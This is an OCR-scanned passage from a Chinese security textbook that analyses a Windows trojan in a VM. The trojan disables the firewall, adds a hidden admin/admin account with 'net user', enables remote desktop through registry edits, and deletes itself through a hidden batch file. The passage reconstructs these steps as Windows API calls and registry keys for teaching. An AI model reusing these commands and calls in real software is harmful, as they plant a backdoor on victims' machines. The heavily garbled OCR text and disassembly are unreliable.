从 采 面 右 下 角 出 现 防 火 墙 关 闭 气泡 提示 ， 很 明显 地 看 出 该 病毒 也 关闭 了 系统 防火 墙 ， 


如 图 9-38 所 示 。 


备注 : Windows ААТА ВОВУ KS, 


фун 检查 设置 | 人 
此 十 算 机 尚未 配置 НЯ: ще ид Бад, 让 Windows 自动 用 重要 更 新 保持 
РВА ОЕТ). Би Л? 

局 用 目 动 更 新 | 4 
7 病毒 防护 找 不 到 а 


Windows 在 计算 机 上 找 不 到 防 病毒 软件 。 e e НСИ АЯ 
аа а IË Др : иа sn 以 执行 的 操作 。 


备注 : Windows ТАМАТА PAE 


Ее: 


图 9-38 防火墙 关闭 提示 
检测 ApateDNS， 发 现 并 没有 对 Internet 进 行 的 访问 ， 如 图 9-39 所 示 ， 说 明 病 毒 没 有 悄 
悄 在 后 台 访 问 网 站 或 下 载 其 他 病毒 。 


Capture Window 


Domain Requested DNS Returned 


[+] Using 127.0.0.1 as return DNS IP! 


[+] Server started at 22:40:45 successfully. 


图 9-39 ApateDNS 截 获 
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再 次 进入 虚拟 机 ， 发 现 出 现 另 外 一 个 密码 用 户 ， 则 可 以 推断 病毒 利用 CMD 命 令 进行 
了 一 次 用 户 添 加 操作 ， 如 图 9-40 所 示 。 


_ 


Microsoft 


" 
Windows 


9-40 ” Windows 登 录 界 面 
使 用 快照 还 原 系统 ， 接 下 来 用 调试 工具 对 其 进行 源码 上 的 分 析 。 
自 先 使 用 PEiD 进 行 碍 元 ， 如 图 9-41 所 示 ， 盘 学 结果 显示 其 并 没有 被 加 元 。 
не: Ерос аі занан i N A 
ЕР Section: |text 


First Bytes: 55,8В,ЕС,бА 
Subsystem: Win32 GUI 


Entrypoint: 00001501 — 
File Offset: 00001501 
Linker Info: 6.0 


Microsoft Yisual C++ 6.0 


М Stay оп top [8] |->] 


89-41 Ж 
接 下 来 ， 可 以 选择 Dependency Walker 或 者 Stud_PE 对 其 使 用 的 函数 进行 分 析 ， 在 
KERNEL32.DLL 截 获 的 函数 中 ，CopyFileA 与 CreateFileA 函 数 〈 见 图 9-42 ) 作为 移动 目标 
函数 将 “33.exe” 文 件 移动 至 系统 目录 。 


Ordinal ^ [int | Function | Entry Point 
27 (0x001B) |CloseHandle Not Bound 


НЕА 40 (0х0028) С оруҒі Тед Not Bound 


H/A 
H/A 
H/A 
H/A 
N/A 


ҰЛЫҒЫ ЫЫ ЫШ Шы ЕЕ 


LoadLibraryA 用 来 装载 DLL 文件 库 ， 在 本 例 中 是 装载 KERNEL32.DLL，WinExec 用 来 


52 (0х0034) 
125 (0х007р) 
170 (Ох00АА) 
178 (0х0082) 
179 (0х0083) 
185 (0х0089) 
191 (Охо0ВЕ) 
202 (0х00СА) 
247 (Ох00ЕТ) 
262 (0х0106) 
264 (0х0108) 
265 (00109) 
277 (0х0115) 
282 (0х011А) 
292 (0х0124) 
294 (0х0126) 
305 (0х0131) 
318 (0х0138) 
336 (0х0150) 
338 (0х0152) 
339 (0х0153) 
342 (0х0156) 
345 (0х0159) 
372 (0х0174) 
373 (0х0175) 
409 (00199) 
411 (0х019Б) 
413 (0х019) 


La “= sm 


CreateFileÀ 
ExitProcess 
FlushFileBuffers 
FreeEnvironmentStringsÀ 
FreeEnvyironmentStringsW 
Get АСР 

GetCPInfo 

Се Сотпап Пл пей 
GetCurrentProcess 
GetEnyironmentStrings 
GetEnvironmentStringsW 
GetEnyironmentVariableÀ 
GetFileType 
GetLastError 
GetModuleFileNameÀA 
GetModuleHandleÀ 

Се + ОЕМСР 

GetProcAddress 
GetStartupInfoÀ 
GetStdHandle 
GetStrineTypeh 
GetStringTypeW 
GetSystemDirectoryÀ 
GetVersion 
GetVersionExÀ 
НеарА11ос 

КезрСгез е 

HeapDestroy 


Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 


Not Bound 


т. С 


9-42 КЕКМЕ! 32 ОП (1) 


执行 程序 ，WriteFile 则 是 写 入 文件 ， 如 图 9-43 所 示 。 
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LCMapStringå 
LCMapStringW 
LoadLibraryå 

№11 +: Ву+еТо! 1 deChar 
Rtllrwind 
SetFilePointer 
SetHandleCount 


SetStdHandle 
TerminateProcess 
UnhandledExceptionFilter 
VirtualÀAlloc 

VirtualFree 
WideCharTollultiByte 


Pn8PPBBBBBBBBE PBI 


WriteFile 


9-43 ”KERNEL32.DLL (2) 
ExitWindowsEx〈 见 图 9-44) 是 关机 程序 ， 目 的 是 为 了 在 Windows 系 统 下 修改 注册 表 
使 其 生效 并 重 局 计算 机 。 
32.08 ІМ [Ordinal ` | Hint Function Entry Point | | 


E) IMA 211 (0х0003) | ExithindowsEx Not Poud 


99-44 USER32.DLL 
如 图 9-45 所 示 的 最 后 三 个 修改 注册 表 的 函数 则 是 局 动 “3389” 的 徘 魁 祸首 。 经 过 奏 看 
图 数 及 行为 分 析 ， 读 者 大 体 已 经 明白 了 该 病毒 的 功能 是 开局 远程 昌 面 ， 关 闭 防 火 墙 ， 建 立 
新 用 户 ， 目 局 重生 。 


Ü 33. Е 

H- 8 KERMEL32 DLL 

H- Ü] 157832. DLL 

由 - |1 [лд 
347 (50158 
351 (0х015Е) | RegCreateKeyExÀ 
390 (0х0186) | RegSetValueExA 


9-45 ADVAPI32.DLL 
而 要 从 源码 上 更 深层 次 地 了 解 该 病毒 ， 就 需要 使 用 反 汇 编 工 具 一 一 IDA Pro/OD， 本 次 
我 们 利用 IDA Pro (049-46) 工具 进行 病毒 源码 的 分 析 。 


|) -IDA v6. 5. 140124 
Pile ІМ Tap Sear 


еве =» е % }$ 


қ } 


lirdows {ер 

ма: [a] ә: ба” # ах 
Load File CIVDocnnants and Settingstadsini (0\33. exe 

Fortable executable for 00306 (PE) [pe 14%] 


Processor type 


МетаРС (disassemble all opcodes) [metapc] “ 
Analysis 


Loading segment [ox00000003 
[7] Enabled 
Loading offset |Ох00000000 Indicator enabled 


Options 

-creste зама 
C] Load resources 

Rename DLL entries 


rika asa 


Fill segment gaps 


E create фен жөне 


C Create FLAT group 


DLL directory С: WIRDOYS 


9-46 IDA Pro 
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单 击 OK 按 钮 进入 主 界面 ， 出 现 如 图 9-47 所 示 的 反 汇 编 文本 界面 。IDA Pro 还 文 持 图 形 


模式 ， 按 “空格 ” 键 进行 切换 ， 如 图 9-48 所 示 。 


IDA — C:\Documents and SettingsyvadminX EI] X 33. ехе 


File Edit 


Search View Debugger Dptions Windows Help 


р 


-А [Х| 


esi 


External symbol 


Г 6, ф sa ПО Зан жах p О Шәке м) 918): 
П ul 


Library function | Data BB Regular function P Unexplored № Instruction 


„гехг: 9091900 
„Сех с: 00401000 ; File Мате 
.text:00401000 Format 
.-text:00401000 
.-text:00401000 
-text:00401000 
.-text:00401000 
.-text:00401000 
.-text:00401000 
-text:00401000 Alignment 
-text-001501000 05 tupe 
.ТехЕ: 99491099 
.ТехЕ: 09491009 
„Сехг: 09491909 
„Сехг: 09401009 
„Техг: 0094910909 
„Техг: 0094910909 
.ТехЕ: 994910909 
„Сехг: 09491909 
-ҒехЕ:8 8501880 
.ҒехЕ:8 85081880 
„Техг: 00301000 
„Техг: 094910909 
-EXL:UU4U1TUUU text 
.ҒехЕ:8 8501880 
„Техг: 85081880 
.ТехЕ: 909491099 

- сех: 00301000 
„Сехг: 094910089 
.ҒехЕ:8 8501880 
.ҒехЕ:8 08501880 
-text:00401000 ; int _ cdecl sub 46061696(HKEY hKey, LPCSTR Ір5изКеу, LPCSTR lpValueName, BYTE »1рОаГа) 
.ҒехЕ:80501088 си» 5010080 
-сехі: 00301000 

-сехі: 00301000 

-сехі:0 0501000 hKey 


Imagebase 


00001000 00401000: зир 401000 


Application Туре: 


Нех Уіеч-А 


9 | М 


Structures 


C:\Documents and Settings%sadminxsE[B]N33.exe 


: Portable executable for 80386 (PE) 


: 400000 


: deFault 
: HS Windows 


Section 1. (virtual address 0000108080) 
Uirtual size 

Section size im File 
Offset to raw data for section: 
Flags 60000020: Text Executable Readable 


99004Е78 ( 20088.) 
00005000 ( 2904809.) 


00001000 


Executable 32bit 


include uni.inc ; see unicode subdir of ida for info on unicode 


-686p 
- MMX 
-model flat 


Segment type: Pure code 
Segment permissions: Read/Execute 


segment para public “ІШЕ” use32 


assume cs:_text 
sorg 4919981 


assume es:nothing, ss:nothing, ds:_data, Fs:nothing, gs:nothing 


SUBROUTINE 


proc near 


= dword ptr 4 


; CODE XREF: sub_401180+921p 
; ит пМатп(х,х,х,х)+ Вр ... 


图 9-47 文本 模式 


е51 
есх 


; dw0ptions 
; ТрС1а55 

; Reserved 
; ТрзибКеу 
; ПКеу 
х 


ds :RegCreatekeyExA 


eax, eax 
short loc_4010C9 


Structures 


offset aErrorNoRegcrea ; "error по RegCreateKeyEx %5\п"' 


5ub 4814008 


еѕр, 
esi 


Я ка СЗ 


push 
push 
call 
add 
pop 
retn 


esi 

offset aErrorHoRegsetu 
540 4601406 

esp, 8 

е51 


图 9-48 


Ш ка СЗ 

10с 501069 : 

mou езі, [е5р+Н+1рУа1иеНате | 

mov eax, [еѕр+д+1рѕиһЬКеу] 

1еа edx, Гезр+ч+ Data] 

push 4 ; CbData 

push edx ; lpData 

push ы ; duTupe 

push а ; Reserved 

push ез1 ; lpValueName 

push еах ; ПКеу 

са11 ds :Ведзе Мат чеЕхй 

test еах, вах 

jz short loc_1N0108F9 

y ғы 

= + 


2 


; "error no RegSetUalueEx %5\п"[ Пос 1848Е8: 


图 形 模式 


moy ecx, [esp+4+1pSubKkey] 
push ecx ; hKey 
call ds:RegCloseKey 

pop esi 

retn 


emh AJANA nnen 


在 文本 模式 下 ， 筋 日 备注 为 监 色 字体 ， 语 名 注释 则 用 绿色 字体 ， 粉 色 字 体 表 示 调 用 的 
图 数 名 称 ， 灰 色 字 体 则 专门 对 offset 进 行 注释 。 
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ША Pro 图 形 模式 类 似 程序 的 流程 图 。 在 图 形 模式 中 ， 红 色 箭 头 届 表示 没有 发 生 该 条 
件 跳 转 ， 绿 色 箭 头 包 表 示 该 跳 转 已 发 生 ， 而 赣 色 箭头 则 表示 发 生 无 条 件 跳 转 ， 癌 上 的 箭头 
则 通常 表示 循环 体 。 

仍然 从 函数 入 手 ， 这 里 使 用 较为 方便 的 图 形 模式 进行 源码 分 析 。 执 行 View 一 subviews 一 
Imports 命 令 ， 打 开 的 Imports 界 面 如 图 9-49 所 示 。 


IDA View-À [ Hex Уіен-А 
Address Ordinal Hame | Library 


%-| 00406000 
ФЕ 00406004 
ФЕ 00406008 
ФЕ) 00406006 
ФЕ) 00406010 
№=| 00406014 
ФЕ 0040601С 
ФЕ) 00406020 
№=| 00406024 
ФЕ 00406028 
№=| 0040602С 
№=] 00406030 
№=| 00406034 
№=| 00406038 
ФЕ 00406036 
%-| 00406040 
ФЕ) 00406044 
ФЕ) 00406048 
№=| 0040604С 
ФЕ) 00406050 
№=| 00406054 
ФЕ) 00406058 


LookupPrivileeeValueh 
ådjustTokenPrivileges 
КегСгеаїеКеуЁхА 
RegSetValueExÀ 
RegCloseKey 
ÜpenProcessToken 
CreateFileÀ 
GetVersionExÀ 
WriteFile 
GetStringTypet 
GetStringľypeå 
CloseHandle 

WinExec 
GetSystemDirectoryå 
GetModuleFileNameå 
СоруЁЕ11еА 
GetCurrentProcess 
GetModuleHandleÀ 
GetStartuplInfoÀ 
GetCommandLineÀ 
GetVersion 
ExitProcess 


АПУАРІЗ2 
АПУАРІЗ2 
АПУАРТЗ2 
АПУАРІЗ2 
АПУАРІЗ2 
АПУАРІЗ2 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕІ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕЕНЕІ 32 
КЕЕНЕТ 32 
КЕЕНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕЕНЕІ 32 
КЕКНЕТ 32 
КЕЕНЕІ 32 


ФЕ] 0040605С TerminateProcess 
图 9-49 Imports 界 面 
按 Ctrl+F 组 合 键 ， 或 者 直接 在 Imports 界 面 输入 函数 名 称 ， 就 会 目 动 搜索 定位 到 该 函 
数 ， 先 选中 CreateFileA 函 数 ， 然 后 双击 它 进 入 反 汇 编 界 面 〈 见 图 9-30) ， 在 此 就 可 以 看 出 
dd hai tie 


图 9-50 ЕЯ 
按 Ctrl+X 组 合 键 ， 局 动 Xref 界 面 〈 交 叉 引 用 ) 〈 见 图 9-S1) ， 这 里 列 出 了 函数 被 调用 
的 地 址 以 及 被 调用 的 次 数 。 


Ez xrefs То CreateFileå 


Шігесіз Тур Address Text 
sub 401230+18 са а=: Суеа е 1] еА 
р sub 4012C0+1B ds:CreateFileÀ 
ШІр г sub 401230+1B са11 ds:CreateFileÀ 
с; Up r sub 4012С041В call ds:CreateFileÀ 
““ о .rdata:D0406504 dd гуа Скез е 1 Те ; Import Address Table 
Line 1 of 5 


图 9-51 Хге м 
选择 地 址 sub 401230+1B， 进 入 其 图 形 模 式 ， 通 过 图 形 模式 可 以 清楚 地 看 到 该 函数 所 
附带 的 功能 及 运行 的 详细 流程 ( 见 图 9-52、 图 9-53) 。 
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uar_CD= byte ptr -6CDh 


esp, 1940 

ерх 
пТепртагевтте 
dwFlagsAndAttributes 
dwCreationDisposition 
lpSecurityAttributes 
dwSshareMode 

399990999" duDesiredñccess 

offset CmdLine ; "del. cmd'' 

ds:CreateFileñ 

ebx, еах 

ebx, ebx 

short loc_4012AD 


esi 

edi 

ecx, ВСП 

esi, offset aNetStopShareda ; "net stop sharedaccess \r\n del 33.ехе \"... 
edi, [esp+116h+Buffer] 


eax, eax 
rep mousd 
поубш 
mousb 
тоу есх, 33h 
1еа edi, |езр+119п+ чак Ср] 
кер stosd 
Теа eax, [esp+110h+Number0fBytesWritten] 
push 9 ; ТрОчектаррейд 
ризп еах ; 1lpHumber0FfButesuritten 
Теа ecx, [esp+118h+Buffer] 
push th ; nNumber0fButesTowWrite 
push ecx ; lpBuffer 
push ebx ; hFile 
тоу [esp*+124h+NumberOfBytesWritten], 8 
call ds:WriteFile 
push ebx ; hObject 


call ds:CloseHandle 
III 


图 9-52 CreateFileA (1) 


WE “а алани е 
тоу [esp+124h+Number0fBytesWritten], 8 
call ds:WriteFile 

push ebx ; hObject 

call ds:CloseHandle 

push 8 ; UCmdShow 

push offset CmdLine ; “del.cmd" 

call ds:WinExec 

pop edi 

pop esi 


ebx 
esp, 1941 


sub 101230 endp 


图 9-53 CreateFileA (2) 
从 图 9-53 中 可 以 看 出 ， 首 先 映 入 眼帘 的 是 备注 offset CmdLine 的 “del.cmd” 语 句 ， 结 
合 后 文 的 aNetStopShareda 函 数 及 其 灰 字 备注 ， 可 以 得 出 该 目 删 除 过 程 是 先 调用 CreateFileA 
函数 创建 了 一 个 CMD 命 令 文件 ， 返 回 一 个 实例 句柄 ， 同 时 通过 WriteFile 预 先 写 好 命令 ， 实 
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现 关 闭 防 火 墙 以 及 删除 文件 自身 功能 。 然 后 ， 再 通过 最 后 的 WinExec 函 数 АШЫШ 
运行 该 “delcmd” 删 除 上 自身， 并且 设 置 其 窗口 为 隐藏 状态 ， 这 就 是 为 什 at Jump S 
么 之 前 我 们 用 Process Monitor 检 测 到 了 CMD 在 一 瞬间 被 使 用 之 后 ，“33.，: да т => 
exe” 神 秘 消 失 的 原因 ， 由 此 可 见 病毒 并 不 神秘 。 一 一 一 一 一 一 

之 后 我 们 可 以 单 击 界面 左上 角 Jump 菜 单 下 面 的 左 箭头 〈 见 图 9-54) 954 ЖӘН 
回 到 刚才 的 CreateFileA 函 数 界面 ， 然 后 调 出 Xref 选 择 第 2 个 地 址 sub 4012C0+1B， 并 进入 图 
形 模式 。 

对 比 上 例 “del.cmd”“add.cmd” 名 称 与 之 形成 鲜明 对 比 ， 该 过 程 则 是 通过 命令 “net 
user admin” 来 添加 新 用 户 ， 由 注释 可 知 新 添加 的 账户 以 及 密码 均 为 admin， 如 图 9-55 所 示 。 


var 95= byte ptr -95h 


sub esp, 1941 

push ebx 

push 8 ; hTemplateFile 

push 2 ; duFlagsñndñttributes 
push 2 ; dwCreationDisposition 
push 9 ; lpSecurityfAttributes 
push 2 ; dwSharehMode 

push 1n00880808h ; duDesiredñccess 


push offset FileName ; "add. cmd'' 
call ds:CreateFileñ 


тоу еһх, еах 
test ebx, ebx 
12 short loc 481330 


, 1Ah 

i, offset aNetUsernhdminNe ; "net user admin Ағып net user admin admi"... 
‚ [esp+118h+Buffer] 
, вах 


‚ 251 
‚ [esp+119h+uar 95] 


eax, [esp+118h+NHumber0fButesUritten] 

9 ; ТрОуекТаррейд 

еах ; lpNumberOfBytesWritten 
ecx, |езр+1181+ВиЕЕен | 

64h ; nNumberOfBytesToWrite 
есх ; lpBuffer 

ebx ; hFile 
[esp+124h+Number0fBytesWritten], 0 
ds:uriteFile 

ebx ; h0bject 
ds:GloseHandle 

9 ; UCmdShow 

offset FileName ; "add.cmd" 

ds : 41 пЕхес 

edi 

е51 


图 9-55 Сгеае ед (3) 
最 后 ， 在 C 语 言 中 来 看 看 这 些 函 数 的 真面目 。 


HANDLE СгеаіеЕі1е ( 


LPCTSTR 1рЕ11еМапе, // 指 向 文件 名 称 的 指针 
DWORD dwDesiredAccess, // 访 问 权限 
DWORD dwShareMode, / /共享 方式 
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ТРЗЕСОВТТУ ATTRIBUTES lpSecurityAttributes,// 安 全 属性 


DWORD dwCreationDisposition, / /创建 标志 
DWORD dwFlagsAndAttributes, // 文 件 属性 
HANDLE hTemplateFile // 模 板 文件 句柄 


); 


首先 来 认识 一 下 参数 前 的 类 型 声明 。 

> LPCSTR: 指针 字符 串 类 型 ， 指 向 一 个 常量 字符 串 ， 并 且 以 ”\0” 结 尾 ， 前 级 标识 
为 ]p; 

> DWORD: RF (324) 的 无 符号 长 度 单位 ， 前 缓 标 识 为 dw， 与 之 相近 的 WORD 
类 型 ， 为 双 字 节 (1642), в] 

> HANDLE: 实例 句柄 ， 被 用 于 Windows АРІ ях; 

> HWND: ua, WAR Ah; 

> BOOL: 布尔 值 ， 前 缓 为 b; 

> UNIT: unsigned int， 无 符号 整数 。 

LPSECURITY _ ATTRIBUTES 则 为 一 个 结构 体 ， 有 具体 代码 如 下 。 


СуреаеЕ struct SECURITY ATTRIBUTES | 


DWORD nLength; / /结构 体 大 小 
LPVOID lpSecurityDescriptor; // 安 全 描述 符 
BOOL bInheritHandle ; // 判 断 句 柄 是 否 安全 继承 


} БЕСОКТТУ АТТКТВОТЕ5; 


下 和 面 册 来 谈 谈 参数 值 设 定 。 

(1) lpFileName 一 般 设 置 为 文件 路 径 或 者 文件 的 名 称 。 

(2) dwDesiredAccess 设 置 为 GENERIC READ |СЕМЕВІС WRITE， 即 可 以 进行 读 写 操作 。 

(3) dwShareMode 可 以 为 0。 

(4) FILE SHARE DELETE, FILE SHARE READ, FILE SHARE WRITE 中 任意 
个 数 ， 分 别 为 不 可 共享 、 可 删除 、 可 读 、 可 写 。 

(5) LPSECURITY ATTRIBUTES 则 通常 设置 为 NULL。 

(6) dwCreationDisposition， 表 示 对 文件 存在 与 否 所 执行 的 行为 ， 分 别 为 : 

> CREATE ALWAYS (创建 文件 ， 若 之 前 该 文件 存在 ， 则 改 盖 改写 上 一 个 文件 ) 。 

> CREATE NEW (创建 文件 ， 文 件 存在 时 报错 ) 。 

> OPEN ALWAYS (文件 不 存在 就 创建 文件 ) 。 

> OPEN EXISTING (文件 必须 已 经 存在 ) 。 

> TRUNCATE EXISTING (文件 长 度 清 零 ) 。 

(7) dwFlagsAndAttributes， 病 毒 一 般 会 设置 为 FILE ATTRIBUTE HIDDEN， 也 就 是 
文件 处 于 隐藏 状态 。 
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(8) hTemplateFile, ЖО В ММО. 
由 此 就 可 以 推断 “del.cmd” 以 及 “add.cmd” 的 CreateFile 调 用 方式 为 : 声明 一 个 句柄 
Handle xxx 来 接收 CreateFile 的 返回 值 ， 即 


HANDLE ХХХ = CreateFile("del/add.cmd",GENERIC WRITE, FILE SHARE | 
WRITE, 0, СВЕАТЕ ALWAYS, FILE ATTRIBUTE HIDDEN, NULL); 


是 不 是 很 简单 ? 完成 了 创建 文件 的 操作 ， 下 一 步 就 是 对 文件 进行 读 写 操作 了 ， 即 使 用 
WriteFile 函 数 来 实现 。 


BOOL WriteFile( 


HANDLE hFile, // 文 件 句柄 

LPCVOID lpBuffer, // 写 入 数据 缓存 区 的 指针 

DWORD nNumberOfBytesToWrite, // 写 入 字 节 数 

LPDWORD lpNumberOfBytesWritten，// 用 于 保存 实际 写 入 字 节 数 的 指针 
LPOVERLAPPED lpOverlapped // 用 于 指向 保存 I/0 异 步 信 息 的 结构 体 


|: 


很 显然 ， 在 本 例 中 的 WriteFile 函 数 第 1 个 参数 hFile 是 之 前 调用 CreateFile 函 数 创建 的 
xxx 句 顶 。 第 2 个 参数 lpBuffer 以 及 第 3 个 参数 nNumberOfBytesToWrite 则 是 用 来 写 入 目 删 / 
创建 用 户 的 代码 ， 第 4 个 参数 lpNumberOfBytesWritten 则 指向 实际 写 入 的 代码 ， 最 后 一 个 
lpOverlapped 通 常设 置 为 NULL。 
之 后 执行 的 是 CloseHandle 函 数 ， 因 为 之 前 调用 CreateFile 时 创建 了 一 个 xxx 人 句柄， 
在 文件 读 写 操作 结束 以 后 要 关闭 这 个 句柄 ， 以 防 被 其 他 函数 误 用 并 且 释 放 系 统 内 核资 源 
(HANDLE 句 柄 资源 ) 。 


BOOL CloseHand]e ( 
HANDLE hObject /7 句柄 名 
); 
С1озеНапа1е (X X х); // А Ме 


接着 ， 则 使 用 WinExec 函 数 运 行 CMD 命 令 行 程 序 ， 整 个 过 程 就 结束 了 。WinExec 函 数 
包含 两 个 参数 ， 具 体 如 下 : 


UINT WINAPI WinExec ( 

“Іп LPCSTR lpcmqdLine，// 命 令 行 代码 参数 
“Іп UINT uCmdShow // 命 令 窗口 

) 


第 1 个 参数 jpCmdLine 是 之 前 生成 的 CMD 程 序 ， 第 2 个 参数 uCmdShow 根 据 分 析 来 看 则 
是 隐藏 窗口 ， 也 就 是 设置 为 SW_HIDE。 
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И1 пЕхес ("де1.ста", SW HIDE) ;// 调 入 运行 状态 


通过 查阅 MSDN (微软 提供 的 强大 函数 库 查 询 工 具 ) ， 可 以 了 解 函 数 参 数 的 详细 信 
县 ， 而 函数 后 缀 如 CrateFileA 的 后 级 A 则 表示 编码 方式 为 ASCI 码 ，W 则 表示 Unicode 编 码 ， 


Ex 则 表示 最 新 发 布 。 
接 下 来 看 看 该 病毒 对 于 3389 的 开启 过 程 〈 见 图 9-$S6) 。 


ecx, [esp+hKeu] 
esi 
есі, |езр+4+1р5шрКеу| 
eax, [esp+%u+1pSubKeu] 
8 ; lpdwDisposition 
еах ; phkResult 
8 ; 1pSecurituñttributes 
ВЕ 8ӨЗЕІ ; samDesired 
; dw0ptions 
; ТрС1а55 
; Reserved 
; ТрзирКеу 
; hKey 
ds :КедСкеаГеКеуЕхя 
eax, eax 
short 10с 8081039 


есі 

offset aErrorNoRegcrea ; "error по RegCreateKeyEx %5\п"' 
си» 4981408 

esp, 8 

е51 


‚ Гезр+4+1рдага| 


і, ебх 
‚ ВЕЕЕЕЕЕЕЕП 
‚ вах 


i, [еѕр+8+1руа1иеМапе] 


repne scasb 
есх 
есх 
есх 
edx 


edx, 


1 
еах 
есі 
ейх 


; сһраға 

; Трбага 
[esp+108hn+1pSubKeu] 

; dwType 

; Reserued 

; lpValueName 

; hKeu 


ds:RegSetUalueExñ 


eax, 


图 9-56 ”注册 表 过 程 ( 1) 


еах 


ДЕН JA R: Н ЕЕ K р 0 КеоСтеаіеёКкеуЕхА. Кео5е(УашеЕхА, RegCloseKey 
得 知 ， 该 图 形 过 程 押 代表 程序 的 作用 是 修改 之 前 使 用 Regshot 快 照 得 出 的 注册 表 键 值 ， 也 


Әл: 


НЕКҮ LOCAL MACHINE\SYSTEM\ControlSet001\Control\Terminal ServerRDPTcp 
НЕКҮ LOCAL MACHINE\SYSTEM\ControlSet00 1\Services\RDPWD\Enum 

HEKY LOCAL MACHINE\SYSTEM\ControlSet00 1\Services\TDTCP\Enum 

НЕКҮ LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Зегуе\КОРТср 
НЕКҮ LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\RDPWD\Enum 
НЕКУ LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\TDTCP\Enum 


等 等 。 


分 析 一 下 流程 ， 这 个 程序 使 用 RegCreateKeyExA 来 打开 /创建 以 上 的 注册 表 ， 并 且 返 回 
创建 一 个 实例 句柄 。 这 里 出 现 一 个 条 件 跳 转 语句 ， 如 果 函 数 调 用 失败 则 返回 error 并 且 退 出 
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程序 ， 若 打开 /创建 程序 成 功 便 调用 RegSetValueExA 对 该 键 值 进行 修改 。 随 后 继续 出 现 一 
个 条 件 跳 转 语句 ， 也 就 是 对 于 键 值 是 否 修改 成 功 进行 判断 ， 如 果 修 改 失 败 则 返回 error 然 后 


退出 程序 ， 如 果 修 改 成 功 则 调用 RegCloseKey 关 闭 句 柄 ， 如 图 9-S7 所 示 。 


са11 ds:RegSetUalueExñ 
test еах, еах 

рор edi 

| short loc 4819274 


е51 
offset aErrorNoRegsetu ; “error по RegSetUalueEx %5\п“[ Пос 801075: 
sub 501508 eax, Гезр+4+1р5шрКеу | 


esp, 8 еах ; hKey 
е51 ds:RegCloseKeu 


Sub 801888 endp 


图 9-57 ”注册 表 过 程 (2) 
查 疯 MSDN， 从 源码 上 分 析 这 三 个 函数 。 


LONG WINAPI RegCreateKeyEx ( 


НКЕУ hKey, //НКЕУ: 注册 表 根 键 

LPCTSTR lpSubKey, // 打 开 或 创建 键 值 

DWORD амВеѕегуеа, // 人 参数 必须 设 为 0 

LPTSTR lpClass, // 用 户 定 义 的 类 , 可 以 设 为 NULL 

DWORD dwOptions, // 功 能 选择 

ВЕСЗАМ samDesired, // 访 问 权 限 

CONST LPSECURITY ATTRIBUTES lpSecurityAttributes，// 安 全 属性 
PHKEY phkResult， / /用 来 接收 打开 /创建 键 值 的 句柄 

LPDWORD phkResult / /装载 变量 


); 


第 1 个 参数 hKey 的 值 往 往 是 注册 表 根 键 其 中 之 一 ， 注 册 表 根 键 为 以 下 S 个 。 

> HKEY USERS: 保存 计算 机 所 有 用 户 的 信息 ， 包 括 登 录 计 算 机 账号 及 密码 。 
> HEKY CLASSES ROOT: 保存 文件 类 型 的 信息 。 

> НЕКУ CURRENT USER: 保存 当前 系统 的 用 户 信 息 。 

> НЕКҮ CURRENT CONFIG: 保存 当前 用 户 的 系统 配置 信息 。 

> НЕКҮ LOCAL MACHINE: 保存 计算 机 硬件 信息 ， 包 括 远程 计算 机 访问 的 键 值 。 
由 开启 远程 桌面 “3389” 功 能 确定 : 

第 1 个 参数 设置 肯定 为 排列 在 末尾 的 HEKY LOCAL MACHINE. 

第 2 个 参数 ljpSubKey 则 设置 为 之 前 Regshot 快 照 中 被 修改 的 注册 表 键 值 的 地 址 。 
第 3 个 参数 dwReserved 设 置 为 0。 

第 4 个 参数 ]jpClass 奋 用 户 没 有 定义 类 ， 则 设 NULL。 
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第 5 个 参数 dWOptions 设 置 为 REG ОРТІОМ BACKUP RESTORE、REG OPTION ` 
CREATE LINK. ВЕС OPTION МОМ VOLATILE、 ВЕС OPTION VOLATILE 之 一 ， 
其 中 常用 的 为 REG OPTION МОМ VOLATILE: 信息 保留 在 文件 中 ， 重 启 之 后 仍然 被 保 
£. КЕС OPTION VOLATILE 信息 保留 在 内 存 中 ， 重 启 之 后 失去 效果 。 

第 6 个 参数 samDesired， 一 般 均 为 KEY АП. ACCESS， 也 就 是 允许 所 有 操作 。 

第 7 个 参数 lpSecurityAttributes 指 向 的 句柄 无 继承 则 设置 为 NULL。 

第 8 个 参数 phkResult 可 以 指 回 定义 任意 一 个 根 键 的 地 址 ， 用 于 被 其 他 注册 表 函 数 使 
用 ， 如 定义 HKEY hKEY， 则 参数 设置 为 &hKey。 

最 后 一 个 参数 为 REG CREATED NEW KEY ( 若 子 键 存在 则 打开 ， 不 存在 则 创建 ) 
或 者 REG OPENED EXISTING KEY ( 当 且 仅 当 子 键 存在 时 打开 ) 。 

当 RegCreateKeyEx 创 建 或 者 打开 一 个 子 键 值 后 ， 接 下 来 就 是 调用 RegSetValueEx 对 其 


键 值 进行 修改 。 
LONG RegSetValueEx ( 

HKEY hKey, // 根 键 
ТРСИЗТВ lpValueName, // 将 要 修改 的 键 值 名 称 
DWORD Reserved, // 设 置 为 0 
DWORD dwType, // 键 值 的 数据 类 型 
CONST ВҮТЕ* lpData, // 指 向 读 写 键 值 的 缓冲 区 
DWORD cbData // 缓 存 区 大 小 


| 


本 例 中 的 参数 一 hKey 就 被 设置 为 RegCreateKeyEx 中 的 phkResult 的 参数 HKEY。 参 数 一 
得 到 了 将 要 修改 键 值 的 详细 地 址 ， 因 此 参数 二 lpValueName 只 用 设置 为 键 值 的 键 名 。 参 数 
四 dwType 通 常设 置 为 REG_DWORD (用 于 修改 双 字 类 型 ) 或 者 REG_SZ (用 于 修改 字符 
串 类 型 ，SZ (string zero) 表示 null 结 尾 的 字符 串 ) 。 参 数 五 jpData 设 置 为 指 问 包含 数据 组 
冲 区 《修改 键 值 的 目标 值 ) 的 指针 。 参 数 六 cbData 可 以 通过 strlen 函 数 /size of 函数 分 别 得 出 
